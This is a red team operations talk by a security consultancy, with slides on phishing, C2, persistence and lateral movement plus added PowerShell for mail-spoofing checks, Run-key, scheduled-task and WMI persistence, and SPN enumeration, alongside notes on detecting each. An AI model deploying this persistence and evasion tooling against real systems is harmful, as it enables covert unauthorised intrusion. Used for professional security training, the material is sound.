Taking security a step further Red Team operations
ME
- Geek
- 20 years of experience doing hacking
- Authored tools / articles / books / etc.
- Speaker at conferences around the world
- Volunteer at OWASP
- Still getting the same thrill when compromising a host
- CEO at SECFORCE

SECFORCE
- IT security consultancy – penetration testing
- Highly specialised in offensive security
- Teams located in London (UK) and Malta
- Services: Penetration Testing, Incident Response, Red Team Testing, Blockchain security
Agenda
1. Introduction
2. Why Red Teaming
3. How is a Red Team operation conducted
4. Questions and answers
1. Introduction
DEFENSIVE vs OFFENSIVE
Defensive:
- AV and firewall vendors
- Blue Team, sysadmins, etc.
- SIEM, IDS, IPS, etc.
Offensive:
- Penetration testing
- Red Team
- A lot more fun! :-)
PENETRATION TESTING vs RED TEAM
Penetration testing:
- Specific target – narrow scope
- Aiming for full coverage of issues
- Stealth is not important
- Assess the security controls such as patch management, password policies, access control, etc.
Red Team:
- Wider scope
- Stealth attack
- Assess controls such as incident response, monitoring, network sensors, user security awareness, etc.
- Sophisticated attacks
- Longer engagements
WHAT IS A RED TEAM OPERATION?
- An assessment to identify the resilience of an organisation to highly sophisticated targeted attacks
- A team of attackers performs an attack to help the target organisation identify weaknesses in its defensive mechanisms
- Some of these exercises may replicate attacks such as: hacktivists, ransomware attacks, state-sponsored threat actors
2. Why Red Teaming?
Why perform a Red Team assessment?
- How else would an organisation know its resilience?
- Regulatory compliance
- Assess security holistically, instead of in isolation
- Assess user security awareness
- Train a blue team
3. How is a Red Team operation conducted?
INFRASTRUCTURE vs STAFF
Infrastructure:
- Identification of security holes
- Critical issues affecting the perimeter
- Development systems? UAT? etc.
- Misconfigurations, etc.
Staff:
- Spear phishing attacks
OUTSIDE vs INSIDE
Outside:
- External reconnaissance
- Assessment of the perimeter
- Identify target users for phishing
- Identification of misconfigurations
- Goal: network foothold
Inside:
- Network awareness
- Persistence
- Understanding the current security controls
- Privilege escalation
Tools
- Cobalt Strike
- Empire
- PowerShell (Microsoft's post-exploitation language ;-) ): PowerView, PowerUp, PowerSploit
- Custom scripts
- Living off the land: WMI, WinRM, GPO
- Nmap and Nessus (only for external testing)

Methodology
1. Detective work
2. Design an attack
3. Deliver the attack
User Reconnaissance
Look for: emails, departments, files (metadata), user/domain names, password dumps, ex-employees...
Sources and tools: Google-fu, social media, theHarvester, Maltego, FOCA, threat intelligence

Infrastructure Reconnaissance
Goal: get a list of IP addresses / domains to target
Google-fu, Whois, DNS brute force, SSL certificate review, web crawling, etc.

Infrastructure Assessment
Goal: identification of RCE issues such as misconfigured Tomcat, SQLi, SMTP relays, Shellshock, Heartbleed, etc.
- Nmap (common ports)
- Nessus
- Standard penetration testing tools
- Commonly conducted over VPN
Phishing
- Recon gave us emails, departments and ideas
- Profiling
- Prepare pretexts (domains, mail server, sites, etc.)
- Delivery: macros or Java usually, but others exist (.hta, .js, .sct files); password-protected zip files
- Payload: Cobalt Strike Beacon
- Spoofing? Check SPF + DKIM + mail relays
- Mail filters? MX records and NDRs help!
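The last two bullets (can the target domain be spoofed, and what is filtering its mail?) are answerable from DNS before a single message is sent. The function below is an added example, not the speaker's tooling: it pulls the SPF, DMARC and MX records for a domain with Resolve-DnsName (DnsClient module, Windows 8 / Server 2012 and later) and reports the DMARC policy, the SPF "all" qualifier, and a guess at the filtering vendor. The vendor patterns in $filters are my assumptions, not an authoritative list.

```powershell
function Get-MailSpoofPosture {
    [CmdletBinding()]
    param([Parameter(Mandatory)][string]$Domain)

    # SPF lives in a TXT record on the apex; DMARC in a TXT record on _dmarc.<domain>
    $txt   = Resolve-DnsName -Name $Domain -Type TXT -ErrorAction SilentlyContinue
    $spf   = ($txt | ForEach-Object { $_.Strings -join '' }) |
             Where-Object { $_ -like 'v=spf1*' } | Select-Object -First 1
    $dmarc = (Resolve-DnsName -Name "_dmarc.$Domain" -Type TXT -ErrorAction SilentlyContinue |
              ForEach-Object { $_.Strings -join '' }) |
             Where-Object { $_ -like 'v=DMARC1*' } | Select-Object -First 1
    $mx    = Resolve-DnsName -Name $Domain -Type MX -ErrorAction SilentlyContinue |
             Where-Object { $_.NameExchange } | Sort-Object Preference |
             Select-Object -ExpandProperty NameExchange

    # DMARC 'p=' decides what a receiver does when SPF/DKIM alignment fails
    $policy = if ($dmarc -match '(?:^|;)\s*p=(none|quarantine|reject)') { $Matches[1] } else { 'absent' }
    # SPF qualifier on the final 'all': -all hard fail, ~all soft fail, ?all neutral, +all anything goes
    $spfEnd = if ($spf -match '([~\-?+]all)\s*$') { $Matches[1] } else { 'absent' }

    # Filtering vendor guessed from the MX hostname (assumption: illustrative patterns only)
    $filters = @{
        'mimecast'             = 'Mimecast'
        'pphosted|proofpoint'  = 'Proofpoint'
        'protection\.outlook'  = 'Exchange Online Protection'
        'google|aspmx'         = 'Google Workspace'
        'barracuda'            = 'Barracuda'
        'messagelabs|symantec' = 'Symantec.cloud'
    }
    $vendor = 'unknown / self-hosted'
    foreach ($pattern in $filters.Keys) {
        if ($mx -match $pattern) { $vendor = $filters[$pattern]; break }
    }

    # A direct spoof of the domain is only cheaply rejected when DMARC is enforcing
    $spoofable = ($policy -eq 'none' -or $policy -eq 'absent')

    [pscustomobject]@{
        Domain            = $Domain
        SPF               = $spf
        SPFQualifier      = $spfEnd
        DMARCPolicy       = $policy
        MX                = $mx
        MailFilter        = $vendor
        DirectSpoofLikely = $spoofable
    }
}

# Usage against a target domain (replace with the real one):
# Get-MailSpoofPosture -Domain example.com | Format-List
```

A p=reject policy only stops mail that claims to be *from* the target domain; it does nothing against the pretext domains the slide mentions, which is why those get registered in the first place. The MX vendor tells you which sandbox your attachment has to survive, and a bounced message (NDR) from that gateway usually names the product and version outright.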
Phishing - profiling (screenshot slides)
Phishing payload creation
- We have a good understanding of the target
- Choose the angle of attack
- AV bypass
- Communication channels to C2 server
AV evasion (demo slide)
Delivery – Office macro (demo slide)
Delivery – Java applet (demo slide)
Command & Control
- HTTP(S): Beacon is proxy aware, but some proxies inflict pain :(
- DNS: beware of command output! (every byte of output has to be tunnelled through DNS queries; large output is slow and noisy)
- Totally legit-looking domains: static-jquery.com, msn-cdn.com, onedrive-live.co.uk
- Web filtering checks domain reputation, based on age, category, etc.
- Cobalt Strike Malleable C2

Malleable C2 profile (example slide)
Gaining a network foothold!

OUTSIDE -> INSIDE
We are in! Now what?
Situational awareness:
    whoami /groups
    process list + steal_token (explorer.exe)
    powershell $PSVersionTable.PSVersion
    net start | findstr -i "protect vir"
    systeminfo | find "Boot Time"
    echo %temp% & time /t
Watch out for network monitoring: only be interactive when you need to; otherwise back off the callback interval (Beacon: sleep 10).

Wait! Let's be safe!
Persistence
- We need to survive reboot
- Don't want to phish again
- Persist on workstations, not servers
- Typical methods: Registry; scheduled tasks; WMI (requires admin); VPN (requires creds)

Persistence – Registry (demo slide)
Persistence – Scheduled tasks (demo slide)
Persistence – WMI (demo slide)
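The three host-based methods from the persistence slide, written out as an added PowerShell example (this is not the speaker's code or the demo shown on the slides). $Name and $Command are placeholders; on an engagement the command would be the Beacon launcher and the name something that blends in. The Run key and scheduled task work as the current user; the permanent WMI event subscription needs local admin, as the slide says. The cleanup function is the part people forget and the client will ask about.

```powershell
$RunKey = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'

function Add-RunKeyPersistence {
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$Command)
    # Fires at every interactive logon of this user; no admin needed.
    New-ItemProperty -Path $RunKey -Name $Name -Value $Command -PropertyType String -Force | Out-Null
}

function Add-ScheduledTaskPersistence {
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$Command, [int]$EveryMinutes = 60)
    # schtasks.exe exists on every supported Windows; /SC ONLOGON would also work,
    # a MINUTE schedule doubles as a heartbeat if the beacon dies.
    & schtasks.exe /Create /F /SC MINUTE /MO $EveryMinutes /TN $Name /TR $Command | Out-Null
}

function Add-WmiPersistence {
    param([Parameter(Mandatory)][string]$Name, [Parameter(Mandatory)][string]$Command)
    # Permanent event subscription = filter (when) + consumer (what) + binding (glue).
    # This filter fires once when system uptime is between 4 and 5 minutes, i.e. shortly after every boot.
    $query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 " +
             "WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' " +
             "AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"
    $filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments @{
        Name = $Name; EventNamespace = 'root\cimv2'; QueryLanguage = 'WQL'; Query = $query
    }
    $consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments @{
        Name = $Name; CommandLineTemplate = $Command
    }
    Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments @{
        Filter = $filter; Consumer = $consumer
    } | Out-Null
}

function Remove-Persistence {
    param([Parameter(Mandatory)][string]$Name)
    Remove-ItemProperty -Path $RunKey -Name $Name -ErrorAction SilentlyContinue
    & schtasks.exe /Delete /F /TN $Name 2>$null | Out-Null
    # Binding first, then the filter and consumer it referenced.
    Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like "*Name=`"$Name`"*" } | Remove-WmiObject
    Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='$Name'" | Remove-WmiObject
    Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer -Filter "Name='$Name'" | Remove-WmiObject
}

# Example with placeholder names and path (assumption: sync.exe is the staged launcher):
# Add-RunKeyPersistence -Name 'OneDriveSync' -Command 'C:\Users\Public\sync.exe'
# Add-WmiPersistence    -Name 'OneDriveSync' -Command 'C:\Users\Public\sync.exe'
# Remove-Persistence    -Name 'OneDriveSync'
```

Each method has a matching detection: Run key changes are what Autoruns and registry-set Sysmon rules are built for, task creation logs as event 4698 when object auditing is on, and Sysmon events 19, 20 and 21 record exactly the filter, consumer and binding created above. Pick the method the target's monitoring (which you established during situational awareness) is least likely to be watching, and record what you planted so it can be removed at the end.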
Privilege escalation + lateral movement
They go hand in hand.
Priv esc goals:
- Local Admin -> Domain Admin (of course)
- Domain User -> Domain User with access to the target system
Lateral movement goals:
- Our box -> key workstation -> target system
- Our box -> box that leads to compromise of a higher-priv user
- Our box -> box that leads to box that leads to box...
General goal: remain undetected

Privilege escalation tactics
- PowerUp
- GPP files (Group Policy Preferences passwords in SYSVOL)
- Clear-text passwords in files/scripts/shares
- Monitor users
- Inveigh / Responder
- General misconfigurations
- Abuse of common practices: users often have a low-priv and a high-priv account
Capturing password hashes (demo slide)
Lateral movement tactics
User hunting:
- Find more interesting users
- Find out where they are logged in
- Can we log in there?
- Steal their token/creds
- Repeat
Tools for this include PowerView's Invoke-UserHunter and BloodHound.

BloodHound (demo slide)
Lateral movement tactics (continued)
- SMB comms for pivoting
- Not psexec; use wmic/winrm
- A dir against the target (e.g. dir \\<host>\c$) is often enough to check privs
- runas /user:domain\user cmd
- Don't portscan, query the domain: SPN scanning
    setspn -Q */*             (query all SPNs in the domain)
    setspn -L <server/user>   (list the SPNs registered to a specific host or account)
    setspn -Q MSSQLSvc/*      (find every SQL Server instance registered in the domain)
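The setspn commands above need the tool on the box and write to its own console; the same query goes through LDAP from any domain-joined host with the .NET DirectorySearcher, which is what PowerView does under the hood. The block below is an added example, not the speaker's script: Get-DomainSPN runs the equivalent of setspn -Q <class>/* against the current domain, ConvertFrom-SPN splits each SPN into service class, host and port so results can be grouped, and the IsUserObject flag tells you whether the SPN belongs to a computer or to a service account (a user object), which is what user hunting cares about. The sample SPNs at the bottom are constructed for an offline check of the parser.

```powershell
function ConvertFrom-SPN {
    param([Parameter(Mandatory)][string]$SPN, [string]$Account = '', [bool]$IsUser = $false)
    # SPN format: serviceclass/host[:port|instance][/servicename]
    $class,  $rest        = $SPN    -split '/', 2
    $target, $serviceName = $rest   -split '/', 2
    $hostName, $port      = $target -split ':', 2
    [pscustomobject]@{
        Account      = $Account
        IsUserObject = $IsUser      # user object with an SPN = service account worth hunting
        ServiceClass = $class
        Host         = $hostName
        Port         = $port
        ServiceName  = $serviceName
        SPN          = $SPN
    }
}

function Get-DomainSPN {
    param([string]$ServiceClass = '*', [string]$SearchRoot)
    # Defaults to the current domain; pass a DN to search a specific OU or another domain.
    $searcher = New-Object System.DirectoryServices.DirectorySearcher
    if ($SearchRoot) { $searcher.SearchRoot = [ADSI]"LDAP://$SearchRoot" }
    $searcher.Filter   = "(servicePrincipalName=$ServiceClass/*)"   # same as setspn -Q <class>/*
    $searcher.PageSize = 1000                                        # paged so large domains come back whole
    [void]$searcher.PropertiesToLoad.AddRange([string[]]('samaccountname','serviceprincipalname','objectcategory'))

    foreach ($result in $searcher.FindAll()) {
        $acct   = [string]$result.Properties['samaccountname'][0]
        $isUser = ([string]$result.Properties['objectcategory'][0]) -like 'CN=Person*'
        foreach ($spn in $result.Properties['serviceprincipalname']) {
            $parsed = ConvertFrom-SPN -SPN $spn -Account $acct -IsUser $isUser
            # An account can hold SPNs of several classes; keep only the requested one.
            if ($ServiceClass -eq '*' -or $parsed.ServiceClass -eq $ServiceClass) { $parsed }
        }
    }
}

# Offline check of the parser on constructed SPNs (not real hosts):
$sample = 'MSSQLSvc/sql01.corp.example:1433', 'MSSQLSvc/sql01.corp.example:SQLEXPRESS',
          'HTTP/intranet.corp.example', 'TERMSRV/ws042.corp.example'
$sample | ForEach-Object { ConvertFrom-SPN -SPN $_ } | Format-Table ServiceClass, Host, Port

# Live: every SQL Server instance in the domain, one line per host, without a single SYN to the targets
# Get-DomainSPN -ServiceClass MSSQLSvc | Group-Object Host | Select-Object Name, Count
```

One LDAP search against a domain controller is normal workstation behaviour and is rarely alerted on, whereas an Nmap sweep of a /16 is exactly what the network sensors listed on the Red Team slide are there to catch. The host list you get back is also more honest than a port scan: it includes boxes behind firewalls you cannot reach yet, which is useful when planning the "box that leads to box" chain.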
Summary
4. Questions?
Thank you! rodrigo.marcos@secforce.com